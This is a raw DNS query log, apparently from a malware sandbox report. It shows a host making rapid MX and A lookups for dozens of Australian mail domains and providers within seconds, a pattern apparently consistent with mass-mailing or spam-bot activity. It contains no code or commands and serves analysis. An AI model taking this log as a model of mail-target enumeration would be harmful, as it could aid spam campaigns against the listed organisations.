                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:41.329096079 CET8.8.8.8192.168.2.30xc441No error (0)mta5.am0.yahoodns.net98.136.96.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:41.329096079 CET8.8.8.8192.168.2.30xc441No error (0)mta5.am0.yahoodns.net67.195.204.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:41.329096079 CET8.8.8.8192.168.2.30xc441No error (0)mta5.am0.yahoodns.net67.195.228.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:41.329096079 CET8.8.8.8192.168.2.30xc441No error (0)mta5.am0.yahoodns.net67.195.204.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:41.329096079 CET8.8.8.8192.168.2.30xc441No error (0)mta5.am0.yahoodns.net67.195.204.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:41.329096079 CET8.8.8.8192.168.2.30xc441No error (0)mta5.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:41.329096079 CET8.8.8.8192.168.2.30xc441No error (0)mta5.am0.yahoodns.net67.195.204.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:41.329096079 CET8.8.8.8192.168.2.30xc441No error (0)mta5.am0.yahoodns.net67.195.204.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:41.441879988 CET8.8.8.8192.168.2.30x6332No error (0)pacbrands.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:41.453531027 CET8.8.8.8192.168.2.30x27c9No error (0)coffsracingclub.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:41.453531027 CET8.8.8.8192.168.2.30x27c9No error (0)coffsracingclub.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:41.453531027 CET8.8.8.8192.168.2.30x27c9No error (0)coffsracingclub.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:41.453531027 CET8.8.8.8192.168.2.30x27c9No error (0)coffsracingclub.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:41.453531027 CET8.8.8.8192.168.2.30x27c9No error (0)coffsracingclub.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:41.473742008 CET8.8.8.8192.168.2.30xb68bNo error (0)ALT1.ASPMX.L.GOOGLE.COM142.250.150.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:41.475507975 CET8.8.8.8192.168.2.30xd913No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:41.475507975 CET8.8.8.8192.168.2.30xd913No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:41.475507975 CET8.8.8.8192.168.2.30xd913No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:41.475883007 CET8.8.8.8192.168.2.30x30beNo error (0)pacbrands-com-au.mail.protection.outlook.com104.47.71.202A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:41.475883007 CET8.8.8.8192.168.2.30x30beNo error (0)pacbrands-com-au.mail.protection.outlook.com104.47.71.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:41.497597933 CET8.8.8.8192.168.2.30x50c9No error (0)mta6.am0.yahoodns.net98.136.96.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:41.497597933 CET8.8.8.8192.168.2.30x50c9No error (0)mta6.am0.yahoodns.net67.195.204.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:41.497597933 CET8.8.8.8192.168.2.30x50c9No error (0)mta6.am0.yahoodns.net67.195.228.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:41.497597933 CET8.8.8.8192.168.2.30x50c9No error (0)mta6.am0.yahoodns.net67.195.228.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:41.497597933 CET8.8.8.8192.168.2.30x50c9No error (0)mta6.am0.yahoodns.net98.136.96.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:41.497597933 CET8.8.8.8192.168.2.30x50c9No error (0)mta6.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:41.497597933 CET8.8.8.8192.168.2.30x50c9No error (0)mta6.am0.yahoodns.net67.195.204.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:41.497597933 CET8.8.8.8192.168.2.30x50c9No error (0)mta6.am0.yahoodns.net67.195.204.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:41.535804987 CET8.8.8.8192.168.2.30x5192No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:41.535804987 CET8.8.8.8192.168.2.30x5192No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:41.535804987 CET8.8.8.8192.168.2.30x5192No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:41.553940058 CET8.8.8.8192.168.2.30xf6b8No error (0)mta6.am0.yahoodns.net98.136.96.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:41.553940058 CET8.8.8.8192.168.2.30xf6b8No error (0)mta6.am0.yahoodns.net67.195.204.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:41.553940058 CET8.8.8.8192.168.2.30xf6b8No error (0)mta6.am0.yahoodns.net67.195.228.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:41.553940058 CET8.8.8.8192.168.2.30xf6b8No error (0)mta6.am0.yahoodns.net67.195.228.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:41.553940058 CET8.8.8.8192.168.2.30xf6b8No error (0)mta6.am0.yahoodns.net98.136.96.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:41.553940058 CET8.8.8.8192.168.2.30xf6b8No error (0)mta6.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:41.553940058 CET8.8.8.8192.168.2.30xf6b8No error (0)mta6.am0.yahoodns.net67.195.204.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:41.553940058 CET8.8.8.8192.168.2.30xf6b8No error (0)mta6.am0.yahoodns.net67.195.204.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:41.564876080 CET8.8.8.8192.168.2.30x2af4No error (0)qldnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:41.586601019 CET8.8.8.8192.168.2.30xf4ffNo error (0)asav.tpg.com.au27.32.32.10A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:41.616682053 CET8.8.8.8192.168.2.30xfcaeNo error (0)westnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:41.616682053 CET8.8.8.8192.168.2.30xfcaeNo error (0)westnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:41.635901928 CET8.8.8.8192.168.2.30x374No error (0)asav.iinet.net.au203.59.218.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:41.751936913 CET8.8.8.8192.168.2.30xea0fNo error (0)eq.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:41.782529116 CET8.8.8.8192.168.2.30x6cceNo error (0)eq-edu-au.mail.protection.outlook.com104.47.71.202A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:41.782529116 CET8.8.8.8192.168.2.30x6cceNo error (0)eq-edu-au.mail.protection.outlook.com104.47.71.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:41.931330919 CET8.8.8.8192.168.2.30xf180No error (0)optusnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:41.942522049 CET8.8.8.8192.168.2.30x520dNo error (0)penrhos.wa.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:41.942522049 CET8.8.8.8192.168.2.30x520dNo error (0)penrhos.wa.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:41.952779055 CET8.8.8.8192.168.2.30xb2d2No error (0)extmail.optusnet.com.au211.29.133.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:41.965667963 CET8.8.8.8192.168.2.30x6816No error (0)mx1.hc2195-28.iphmx.com216.71.155.113A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:41.965667963 CET8.8.8.8192.168.2.30x6816No error (0)mx1.hc2195-28.iphmx.com216.71.153.82A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:42.023976088 CET8.8.8.8192.168.2.30x20cNo error (0)ozemail.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:42.042615891 CET8.8.8.8192.168.2.30x9a08No error (0)asav.iinet.net.au203.59.218.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:42.103454113 CET8.8.8.8192.168.2.30xc339No error (0)iinet.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:42.103454113 CET8.8.8.8192.168.2.30xc339No error (0)iinet.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:42.122262955 CET8.8.8.8192.168.2.30xb488No error (0)asav.iinet.net.au203.59.218.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:42.181590080 CET8.8.8.8192.168.2.30xdd82No error (0)imcc.wa.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:42.211596966 CET8.8.8.8192.168.2.30xff41No error (0)imcc-wa-edu-au.mail.protection.outlook.com104.47.71.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:42.211596966 CET8.8.8.8192.168.2.30xff41No error (0)imcc-wa-edu-au.mail.protection.outlook.com104.47.71.202A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:42.276241064 CET8.8.8.8192.168.2.30xd3a9No error (0)optusnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:42.295965910 CET8.8.8.8192.168.2.30xa80fNo error (0)extmail.optusnet.com.au211.29.133.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:42.334697962 CET8.8.8.8192.168.2.30xb204No error (0)optusnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:42.358376980 CET8.8.8.8192.168.2.30xfea3No error (0)extmail.optusnet.com.au211.29.133.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:42.429979086 CET8.8.8.8192.168.2.30x379cNo error (0)firstwave.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:42.429979086 CET8.8.8.8192.168.2.30x379cNo error (0)firstwave.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:42.456990957 CET8.8.8.8192.168.2.30x9f3fNo error (0)firstwave-mx2.firstwave.com.au54.206.211.164A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:42.456990957 CET8.8.8.8192.168.2.30x9f3fNo error (0)firstwave-mx2.firstwave.com.au52.65.142.165A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:42.535553932 CET8.8.8.8192.168.2.30x9f06No error (0)spencedoors.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:42.535553932 CET8.8.8.8192.168.2.30x9f06No error (0)spencedoors.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:42.553972960 CET8.8.8.8192.168.2.30xb558No error (0)cluster8a.us.messagelabs.com52.207.128.88A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:42.679423094 CET8.8.8.8192.168.2.30xfb8eNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:42.679423094 CET8.8.8.8192.168.2.30xfb8eNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:42.679423094 CET8.8.8.8192.168.2.30xfb8eNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:42.700196028 CET8.8.8.8192.168.2.30x9e1bNo error (0)mta6.am0.yahoodns.net67.195.228.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:42.700196028 CET8.8.8.8192.168.2.30x9e1bNo error (0)mta6.am0.yahoodns.net67.195.204.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:42.700196028 CET8.8.8.8192.168.2.30x9e1bNo error (0)mta6.am0.yahoodns.net67.195.204.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:42.700196028 CET8.8.8.8192.168.2.30x9e1bNo error (0)mta6.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:42.700196028 CET8.8.8.8192.168.2.30x9e1bNo error (0)mta6.am0.yahoodns.net67.195.204.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:42.700196028 CET8.8.8.8192.168.2.30x9e1bNo error (0)mta6.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:42.700196028 CET8.8.8.8192.168.2.30x9e1bNo error (0)mta6.am0.yahoodns.net98.136.96.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:42.700196028 CET8.8.8.8192.168.2.30x9e1bNo error (0)mta6.am0.yahoodns.net98.136.96.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:42.852991104 CET8.8.8.8192.168.2.30x829dNo error (0)bigpond.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:42.875154972 CET8.8.8.8192.168.2.30x3fdbNo error (0)extmail.bpbb.bigpond.com203.36.137.234A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:42.875154972 CET8.8.8.8192.168.2.30x3fdbNo error (0)extmail.bpbb.bigpond.com203.36.172.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:42.925785065 CET8.8.8.8192.168.2.30x111No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:42.925785065 CET8.8.8.8192.168.2.30x111No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:42.925785065 CET8.8.8.8192.168.2.30x111No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:42.947043896 CET8.8.8.8192.168.2.30xfba4No error (0)mta6.am0.yahoodns.net67.195.228.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:42.947043896 CET8.8.8.8192.168.2.30xfba4No error (0)mta6.am0.yahoodns.net67.195.204.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:42.947043896 CET8.8.8.8192.168.2.30xfba4No error (0)mta6.am0.yahoodns.net67.195.204.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:42.947043896 CET8.8.8.8192.168.2.30xfba4No error (0)mta6.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:42.947043896 CET8.8.8.8192.168.2.30xfba4No error (0)mta6.am0.yahoodns.net67.195.204.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:42.947043896 CET8.8.8.8192.168.2.30xfba4No error (0)mta6.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:42.947043896 CET8.8.8.8192.168.2.30xfba4No error (0)mta6.am0.yahoodns.net98.136.96.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:42.947043896 CET8.8.8.8192.168.2.30xfba4No error (0)mta6.am0.yahoodns.net98.136.96.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:43.033651114 CET8.8.8.8192.168.2.30x4cc7No error (0)cdu.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:43.051717043 CET8.8.8.8192.168.2.30x96eaName error (3)echowebhosting.com.aunonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:43.061909914 CET8.8.8.8192.168.2.30x864cNo error (0)cdu-edu-au.mail.protection.outlook.com104.47.71.202A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:43.061909914 CET8.8.8.8192.168.2.30x864cNo error (0)cdu-edu-au.mail.protection.outlook.com104.47.71.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:43.193502903 CET8.8.8.8192.168.2.30xd9a0No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:43.193502903 CET8.8.8.8192.168.2.30xd9a0No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:43.193502903 CET8.8.8.8192.168.2.30xd9a0No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:43.214613914 CET8.8.8.8192.168.2.30xb34eNo error (0)alphalink.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:43.217412949 CET8.8.8.8192.168.2.30xce22No error (0)mta7.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:43.217412949 CET8.8.8.8192.168.2.30xce22No error (0)mta7.am0.yahoodns.net98.136.96.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:43.217412949 CET8.8.8.8192.168.2.30xce22No error (0)mta7.am0.yahoodns.net67.195.228.94A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:43.217412949 CET8.8.8.8192.168.2.30xce22No error (0)mta7.am0.yahoodns.net67.195.204.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:43.217412949 CET8.8.8.8192.168.2.30xce22No error (0)mta7.am0.yahoodns.net67.195.228.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:43.217412949 CET8.8.8.8192.168.2.30xce22No error (0)mta7.am0.yahoodns.net98.136.96.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:43.217412949 CET8.8.8.8192.168.2.30xce22No error (0)mta7.am0.yahoodns.net67.195.228.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:43.217412949 CET8.8.8.8192.168.2.30xce22No error (0)mta7.am0.yahoodns.net67.195.204.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:43.235275030 CET8.8.8.8192.168.2.30x9dfNo error (0)asav.tpg.com.au27.32.32.10A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:43.368310928 CET8.8.8.8192.168.2.30x63cfNo error (0)bidbuild.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:43.386101007 CET8.8.8.8192.168.2.30xe576No error (0)healforlife.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:43.416476011 CET8.8.8.8192.168.2.30x7964No error (0)healforlife-com-au.mail.protection.outlook.com104.47.71.202A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:43.416476011 CET8.8.8.8192.168.2.30x7964No error (0)healforlife-com-au.mail.protection.outlook.com104.47.71.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:43.489592075 CET8.8.8.8192.168.2.30xf8a7No error (0)optusnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:43.508147001 CET8.8.8.8192.168.2.30x3aadNo error (0)extmail.optusnet.com.au211.29.133.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:43.516515970 CET8.8.8.8192.168.2.30xada6No error (0)mail.bidbuild.com.au69.90.161.80A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:43.569586039 CET8.8.8.8192.168.2.30x5787No error (0)optusnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:43.589705944 CET8.8.8.8192.168.2.30x21c0No error (0)extmail.optusnet.com.au211.29.133.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:43.612106085 CET8.8.8.8192.168.2.30xcd54No error (0)aapt.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:43.612106085 CET8.8.8.8192.168.2.30xcd54No error (0)aapt.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:43.612106085 CET8.8.8.8192.168.2.30xcd54No error (0)aapt.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:43.631066084 CET8.8.8.8192.168.2.30x7d4aNo error (0)optusnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:43.631565094 CET8.8.8.8192.168.2.30x6633No error (0)au-smtp-inbound-1.mimecast.com103.13.69.122A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:43.631565094 CET8.8.8.8192.168.2.30x6633No error (0)au-smtp-inbound-1.mimecast.com124.47.150.122A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:43.631565094 CET8.8.8.8192.168.2.30x6633No error (0)au-smtp-inbound-1.mimecast.com124.47.150.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:43.631565094 CET8.8.8.8192.168.2.30x6633No error (0)au-smtp-inbound-1.mimecast.com103.13.69.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:43.649353027 CET8.8.8.8192.168.2.30x61b3No error (0)extmail.optusnet.com.au211.29.133.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:43.912522078 CET8.8.8.8192.168.2.30xa41dNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:43.912522078 CET8.8.8.8192.168.2.30xa41dNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:43.912522078 CET8.8.8.8192.168.2.30xa41dNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:43.936012030 CET8.8.8.8192.168.2.30xdcafNo error (0)mta6.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:43.936012030 CET8.8.8.8192.168.2.30xdcafNo error (0)mta6.am0.yahoodns.net67.195.228.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:43.936012030 CET8.8.8.8192.168.2.30xdcafNo error (0)mta6.am0.yahoodns.net98.136.96.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:43.936012030 CET8.8.8.8192.168.2.30xdcafNo error (0)mta6.am0.yahoodns.net67.195.204.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:43.936012030 CET8.8.8.8192.168.2.30xdcafNo error (0)mta6.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:43.936012030 CET8.8.8.8192.168.2.30xdcafNo error (0)mta6.am0.yahoodns.net98.136.96.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:43.936012030 CET8.8.8.8192.168.2.30xdcafNo error (0)mta6.am0.yahoodns.net67.195.228.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:43.936012030 CET8.8.8.8192.168.2.30xdcafNo error (0)mta6.am0.yahoodns.net67.195.228.94A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:43.990077972 CET8.8.8.8192.168.2.30xa404No error (0)usyd.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:43.990077972 CET8.8.8.8192.168.2.30xa404No error (0)usyd.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:43.991565943 CET8.8.8.8192.168.2.30xf164No error (0)actraders.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:44.009058952 CET8.8.8.8192.168.2.30xd937No error (0)fahan.tas.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:44.012943029 CET8.8.8.8192.168.2.30x2835No error (0)au-smtp-inbound-2.mimecast.com103.13.69.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:44.012943029 CET8.8.8.8192.168.2.30x2835No error (0)au-smtp-inbound-2.mimecast.com103.13.69.122A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:44.012943029 CET8.8.8.8192.168.2.30x2835No error (0)au-smtp-inbound-2.mimecast.com124.47.150.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:44.012943029 CET8.8.8.8192.168.2.30x2835No error (0)au-smtp-inbound-2.mimecast.com124.47.150.122A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:44.043876886 CET8.8.8.8192.168.2.30x1774No error (0)fahan-tas-edu-au.mail.protection.outlook.com104.47.71.202A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:44.043876886 CET8.8.8.8192.168.2.30x1774No error (0)fahan-tas-edu-au.mail.protection.outlook.com104.47.71.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:44.082736969 CET8.8.8.8192.168.2.30xdab5No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:44.082736969 CET8.8.8.8192.168.2.30xdab5No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:44.082736969 CET8.8.8.8192.168.2.30xdab5No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:44.103380919 CET8.8.8.8192.168.2.30x682cNo error (0)mta6.am0.yahoodns.net67.195.228.109A (IP address)IN (0x0001)false
